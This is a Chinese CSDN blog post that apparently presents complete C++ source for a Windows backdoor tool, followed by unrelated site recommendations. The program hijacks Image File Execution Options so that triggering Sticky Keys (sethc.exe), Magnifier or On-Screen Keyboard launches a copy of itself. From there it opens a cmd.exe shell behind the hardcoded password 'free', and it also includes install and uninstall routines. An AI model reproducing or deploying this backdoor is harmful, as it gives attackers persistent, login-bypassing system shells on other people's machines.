写的一个东东

最新推荐文章于 2022-03-17 23:40:23 发布
最新推荐文章于 2022-03-17 23:40:23 发布
阅读量605 收藏
点赞数
分类专栏: C/C++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/usernameee/article/details/8982295
版权 
// freeheart.cpp : Defines the entry point for the console application.
//学习交流使用,违法使用后果自负。
// by:freeheart time 2013.5.24
// argv 0 = freeheart.exe
// argv 1 = -i  
// argv 2 = name.exe
// argv 3 = 1 2 3
// 此程序使用的映像劫持技术,
// 在注册表当中建立一个程序名的项目,在里面使用debugger,然后在里面指向自己的程序。
//[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
//
#include "stdafx.h"
#include "windows.h"
#include "atlbase.h"
#include <iostream>
using namespace std;


int main(int argc, char* argv[])
{
void anzhuang(char *Path,char *filename);
void xiezai(char *path,char *hName);
void CopyZiji(char *CopyPath);
char *password = "free";          //真密码缓冲区
char *shuruPwd = "";             //输入的密码缓冲区
int errorbuff = 0;
char *PathBuff = "";        
char *FileName = "";
char *chsname = "sethc.exe"; //SHIFT粘贴键程序的名称
char *fangdajing = "magnify.exe"; //
char *pingmujianpan = "osk.exe"; //
LPTSTR sysbuff;         //得到系统路径的缓冲区
TCHAR tchBuffer2[1024];        //申请一个字符变量数组
sysbuff = tchBuffer2;   //把系统的路径放到这个变量数组里


	if(GetSystemDirectory(sysbuff, MAX_PATH))    //得到系统路径
	{
		sysbuff = strcat(sysbuff,"\\");  //strcat 剪切在一起,把\\放在系统路径的后面,然后放入系统缓冲区当中。    
	}




	if (argv[1] != NULL)
	{
		//安装命令判断
		if (strcmp(argv[1],"-i") == 0)
		{
			if (argv[2] != NULL)
			{
				FileName=argv[2];
			}
			else
			{
				cout<<"请输入文件名!";
				return 0;
			}
			if(argv[3] != NULL)
			{
				if(strcmp(argv[3],"1") == 0)
				{
					anzhuang(FileName,chsname);
					PathBuff = strcat(sysbuff,FileName);
					CopyZiji(PathBuff); 
					cout<<"创建完成! : "<<PathBuff<<endl;
					return 0;
				}


					if(strcmp(argv[3],"2") == 0)
					{
					anzhuang(FileName,fangdajing);
					PathBuff = strcat(sysbuff,FileName);
					CopyZiji(PathBuff); //调用函数
					cout<<"创建完成! : "<<PathBuff<<endl;
					return 0;
					}


						if(strcmp(argv[3],"3") == 0)
						{
						anzhuang(FileName,pingmujianpan);
						PathBuff = strcat(sysbuff,FileName);
						CopyZiji(PathBuff); //调用函数
						cout<<"创建完成! : "<<PathBuff<<endl;
						return 0;
						}


			}
							else
							{
							cout<<"请输入参数!"<<endl;
							}
			return 0;
		}
//卸载
		if (strcmp(argv[1],"-u") == 0)
		{
			if(argv[2] != NULL)
			{
				if(strcmp(argv[2],"1") == 0)
				{
					xiezai(sysbuff,chsname);
					cout<<"删除文件成功!"<<endl;
					return 0;
				}
					if(strcmp(argv[2],"2") == 0)
					{
					xiezai(sysbuff,fangdajing);
					cout<<"删除文件成功!"<<endl;
					return 0;
					}
						if(strcmp(argv[2],"3") == 0)
						{
						xiezai(sysbuff,pingmujianpan);
						cout<<"删除文件成功!"<<endl;
						return 0;
						}
			}
							else
							{
							cout<<"请输入参数!"<<endl;
							}
			return 0;
		}
						//为什么会进入这里 因为debugger a.exe 其实是两个参数,因为if (argv[1] != NULL) 也就是第二个参数不等于空的话执行下面的语句。
						while(errorbuff<3)  //循环三次,错误。
							{
							cout<<"password:";
							cin>>shuruPwd;
								if (strcmp(shuruPwd,password) == 0)
								{
								system("cmd.exe");
								break;
								}
									else
									{
									cout<<"密码错误!"<<endl;
									}
									errorbuff++;  //自加一次    
					
							}


							return 0;
	}
system("color a");
cout<<"-----------------------------------------------------"<<endl;
cout<<"欢迎光临自由的心,祝您好运!"<<endl;
cout<<"1: sethc.exe      Shift后门\n";
cout<<"2: magnify.exe    放大镜后门\n";
cout<<"3: osk.exe        屏幕键盘后门\n";
cout<<"-----------------------------------------------------"<<endl;
cout<<"安装: freeheart.exe -i xx.exe 1"<<endl;
cout<<"卸载: freeheart.exe -u 1"<<endl;
cout<<"连接密码:free"<<endl;
cout<<"-----------------------------------------------------"<<endl;
return 0;
}


//安装函数
void anzhuang(char *Path,char *filename)
{
	HKEY hSoftKey = NULL;
	HKEY hCompanyKey = NULL;
	if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"), 0, KEY_WRITE|KEY_READ,&hSoftKey) == ERROR_SUCCESS)
	{
		if (RegCreateKeyEx(hSoftKey, _T(filename), 0, REG_NONE,REG_OPTION_NON_VOLATILE, KEY_WRITE|KEY_READ, NULL,&hCompanyKey,NULL) == ERROR_SUCCESS)
		{
			LPBYTE Value=(LPBYTE)Path; 
			long ret1=::RegSetValueEx(hCompanyKey,"Debugger",0,REG_SZ,(BYTE*)Value,50); 
			RegCloseKey(hCompanyKey);
		}
		RegCloseKey(hSoftKey);
	}
}
//卸载函数
void xiezai(char *path,char *hName) //hName 传递进来的程序名
{
	HKEY hSoftKey = NULL;
	LPCTSTR hMainKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options";  
	if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, hMainKey, 0, KEY_WRITE|KEY_READ,&hSoftKey) == ERROR_SUCCESS)
	{
	DWORD len = 256;
	DWORD type = REG_SZ;
	LPBYTE last = new BYTE[256];
	LPCTSTR hname = (LPCTSTR)hName;  
	char *HHname;
	HKEY hKey;              //在注册表当中创建一个magnify名的项,在里面当中加入debugger,里面跟上自己的程序名的值。
	char* DelCom;
	HHname=strcat((char *)hMainKey,"\\"); //hmainkey 注册表的路径
	HHname=strcat((char *)hMainKey,(char *)hname); //hname 程序名
		if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,(LPCTSTR)HHname,0,KEY_READ,&hKey)==ERROR_SUCCESS && RegQueryValueEx(hKey,"Debugger",0,&type,last,&len)==ERROR_SUCCESS)
		{
			DelCom=strcat(path,reinterpret_cast <char*>(last));
			DeleteFile(DelCom);   //删除文件
			RegDeleteKey(hSoftKey,hname);  //删除注册表
		}
		RegCloseKey(hSoftKey); //关闭句柄
		RegCloseKey(hKey);	//关闭句柄
	}
}


void CopyZiji(char *CopyPath)   //将自身生成exe文件复制到指定的路径下
{
	char PathBuff[MAX_PATH];   //申请一个字符变量数组,大小是系统最大的长度。
	GetModuleFileName(NULL,PathBuff,MAX_PATH); //第一个参数为NULL,就表示获取当前程序的路径,第二个参数就是存放到缓冲区。
	CopyFile(PathBuff,CopyPath,true);    //CurrentPath 是自身exe,把自身复制到目标路径当中
}


00name
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
结构体学习知识归纳
fyzxl的博客
10-13 588
结构体学习知识归纳
模仿音速启动一个东东
12-20
这个【模仿音速启动一个小程序】是用 Delphi 编程语言编的,Delphi 是一种基于 Object Pascal 的集成开发环境(IDE),以其高效、易用和产生高质量的本地代码而闻。 在 Delphi 中创建类似音速启动的应用...
2021-01-13
qq_45701825的博客
01-13 1837
今天中石的比赛打的很拉跨 加油叭 问题 A: 小李数星星 时间限制:1Sec内存限制:128 MB提交状态 题目描述 小李在农村长大,那时候大家喜欢晚饭过后在院子里纳凉,听不懂大人在说什么的小李喜欢抬头看天空,尤其是夏天的夜晚,天上的星星又多又亮。 长大后小李进城打工,每当想家的时他还是喜欢抬头看看天,寻找另一边故乡的记忆。 可是大城市里空气质量太差了,雾霾天气横行,天上能看到的星星也越来越少了。 小李每次用一个正方形去覆盖自己所能看到的星星,随着日子的推移,这个正方形越来越小了,悲伤...
c++评奖(sort排序结构体)
RincolF的博客
03-17 2124
题目背景:东东所在的班级有N同学期末考试进行数学语文英语地理四门功课的测试。班主任要将这N学生中总分前三定为本学期的“学习小标兵”。现在给出这N学生的姓和各科成绩,请你编程找到总分前三,并依次输出他们的姓。所给数据不会有总分相同的情况。 输入格式: 输入包含N+1行,第一行仅有一个正整数N(3≤N≤40),表示东东班里学生的总数,接下来的N行,每行描述一个学生的考试信息,依次为姓数学成绩、语文成绩、英语成绩与地理成绩,两两之间用一个空格分隔。 注意:姓(不会同)都用小
51nod 2139 评奖
qq_47705074的博客
07-22 1098
题目 东东所在的班级有N同学期末考试进行数学语文英语地理四门功课的测试。班主任要将这N学生中总分前三确定为本学期的“学习小标兵”。现在给出这N学生的姓和各科成绩,请你编程找到总分前三,并依次输出他们的姓。所给数据不会有总分相同的情况。 输入 输入共有N+1行,第一行仅有一个正整数N(不超40),表示东东班里学生的总数,接下来的N行,每行描述一个学生的考试信息,依次为姓数学成绩、语文成绩、英语成绩和地理成绩,两两之间用一个空格分隔。注意:姓(不会有同现象)都用小字母表示(至多
程序员四门功课
kunpengku
01-13 856
算法 语言 网络 系统
东东
02-07
【标题】: "东东" 可能是指的项目或者工具的代称,但在这里没有具体的信息,我们将其理解为一个关于Python编程的学习资源或工具包。 【描述】: "东东" 的描述过于简洁,无法提供直接的IT知识点。但我们可以基于...
desktop 一个全API东东
07-31
标题中的“desktop 一个全API东东”指的是一个基于桌面应用开发的项目,这个项目完全依赖于API(应用程序编程接口)来实现功能。API在软件开发中扮演着至关重要的角色,它允许不同的软件组件之间进行通信,为...
自动东东转码工具
04-09
【标题】"自动东东转码工具"指的是一个能够自动化处理文本编码转换的软件或程序。在IT行业中,字符编码是数据存储和传输的重要环节,不同的编码方式(如ASCII、GB2312、UTF-8等)适用于不同的语言环境。这个工具...
txtTip:一个文本框信息提示的jQuery插件!自我感觉良好的一个东东
06-09
txtTip一个文本框信息提示的jQuery插件!不论你是input text还是 input password 它都可以完美提示。这个插件于2013年,现已成为世纪天成平台及各游戏官网通用的标准。######使用说明:######$("input选中器")....
结构体计算成绩
qq_40713201的博客
03-11 861
题目描述 ​ 山治同学所在的班级共有 N 同学期末考试时进行了数学语文英语、地理四门功课的 测试。现要将班里总分最高的同学评为“学习小状元”。​ 如 3 学生,4 门课程的成绩如下: 数学 语文 英语 地理 hong 98 90 87 74 Ming 96 92 85 97 zhang 95 78 56 91 请同学们帮助计算: 每位同学的总分是多少? 找出总分最高的那位同学。 找出所有成绩中最高的分数和最小的分数。 输入 ​ 输入共有 2N+1 行:​ 第一行:有一个整数 N,表示有N 同学
2018-2019赛季多校联合新生训练赛第六场补题与题解(中石油)
一只小蒟蒻的博客
12-16 3888
**总结:**这场比赛是我成绩最好的一次,也是打比赛这么多以来第一次拿到银牌(40)可能因为昨天是我弟弟的生日把哈哈哈哈有他在家里保佑我进银牌区,这场比赛怎么说呢,考点和难度感觉都比上次要高了很多,而且感觉考点非常的生僻,考了个四舍五入,学了一个新函数round 学完这个函数以后感觉以后遇到四舍五入的题目都不是问题了! 下面开始吧! 问题 A: 价钱统计 这题到目前为止我会了三种方法:第一种是...
EffectiveC++ Item25说的东东
weixin_34124651的博客
09-30 62
感觉有点复杂,而且我们一般不会去一个模板,然后再交换模板里的指针; 有可能的情况是上上篇博文提到的情况,可能成员变量含有复制构造花销大的东东,这时需要一些特别的交换函数。 而Meyers大师却考虑的灰常超前,佩服啊!...
application跟消息相关的东东
10-21 321
使用Tapplication的onmessage事件来处理消息.指派一个过程给ONMESSAGE,当应用程序从消息队列中取出一条消息,并准备处理该消息时,就调用这个过程.应用在WINDOWS处理这条消息前,调用这个事件处理过程.application.onmessage事件处理过得是TMessageEvent类型.procedure someobject.appmessagehandler(v
第三周 项目4-考了语文数学同学
huyaping2014的专栏
03-25 321
/* * Copyright (c) 2014, 烟台大学计算机学院 * All rights reserved. * 文件称:test.cpp * 作 者:呼亚萍 * 完成日期:2015年 3月 25日 * 版 本 号:v1.0 * * 问题描述:下面提供了类Stu的数据成员定义,和用于测试的main函数,参考如图的运行结果,完成类的定义,
DocumentNavigator是什么东东
weixin_33830216的博客
07-03 109
在网上找到一个示例(在DotNet里面利用XML|http://www.jojoo.net),里面用到了DocumentNavigator,但运行报错,找不到这个定义,在帮助里搜索,倒是有,一个XMLOrder示例,说只有BETA版本才使用。问:在2003 Enterprise Edition中,如何使用?怎么找不到?...
一个Java代码吧
最新发布
02-10
好的,这是一个简单的 Java 代码示例,它将输出 "Hello, World!" 到控制台: ``` public class HelloWorld { public static void main(String[] args) { System.out.println("Hello, World!"); } } ``` 要运行这段代码,你需要使用一个 Java 编译器(比如 `javac`)将它编译成字节码,然后使用 `java` 运行编译后的字节码文件。 例如,你可以使用以下命令编译和运行这段代码: ``` javac HelloWorld.java java HelloWorld ``` 这样,你就可以在控制台看到 "Hello, World!" 这条消息了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值